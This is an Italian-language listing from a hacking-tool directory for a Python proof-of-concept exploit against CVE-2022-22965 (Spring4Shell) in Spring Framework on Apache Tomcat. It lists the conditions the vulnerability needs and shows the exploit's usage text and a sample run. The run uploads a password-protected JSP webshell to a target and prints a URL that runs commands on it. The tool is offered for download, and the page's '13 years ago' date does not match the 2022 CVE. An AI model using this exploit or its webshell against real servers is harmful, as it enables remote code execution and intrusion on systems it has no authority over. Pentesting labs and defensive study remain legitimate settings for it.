Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Spring4Shell-CVE-2022-22965 — # Exploit proof-of-concept basato su Python per CVE-2022-22965 (Spring4Shell) che mira a Java Spring Core RCE su Apache Tomcat. Carica una webshell JSP con protezione tramite password per l'esecuzione remota di comandi. | Kitploit
Strumenti/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

# Exploit proof-of-concept basato su Python per CVE-2022-22965 (Spring4Shell) che mira a Java Spring Core RCE su Apache Tomcat. Carica una webshell JSP con protezione tramite password per l'esecuzione remota di comandi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
13 anni faNon ancora revisionato
Condividi

Spring4Shell: CVE-2022-22965 RCE

Vulnerabilità RCE del framework Java Spring

Queste vulnerabilità interessano un componente "Spring Core" — il cuore del framework

Condizioni attuali per la vulnerabilità:-

  • JDK 9+
  • Una versione vulnerabile di Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat come server per l'applicazione Spring, impacchettata come WAR
  • Una dipendenza dai componenti spring-webmvc e/o spring-webflux di Spring Framework

L'exploit

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
Scarica lo strumento